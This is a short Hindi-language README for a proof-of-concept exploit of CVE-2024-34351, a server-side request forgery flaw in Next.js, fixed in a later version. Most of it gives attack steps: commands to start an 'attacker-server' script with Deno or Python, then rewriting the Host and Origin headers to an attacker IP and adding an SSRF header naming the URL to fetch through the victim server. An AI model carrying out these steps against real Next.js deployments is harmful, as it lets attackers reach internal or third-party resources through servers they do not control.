
NextJS SSRF (CVE-2024-34351) के पूर्ण शोषण के लिए PoC
NextJS SSRF के पूर्ण शोषण के लिए PoC। एक हमलावर CVE-2024-34351 भेद्यता का उपयोग करके Next.js सर्वर से किसी भी वेबसाइट की सामग्री प्राप्त कर सकता है।
यह भेद्यता [email protected] में ठीक कर दी गई है।
deno run --allow-net --allow-read attacker-server.ts
python3 attacker-server.py
Host हेडर को हमलावर सर्वर पर संशोधित करें। (उदा. Host: 192.198.0.144:8000)Origin हेडर को हमलावर सर्वर पर संशोधित करें। (उदा. Origin: http://192.198.0.144:8000/)SSRF नामक एक नया हेडर जोड़ें। (उदा. SSRF: http://example.com/test)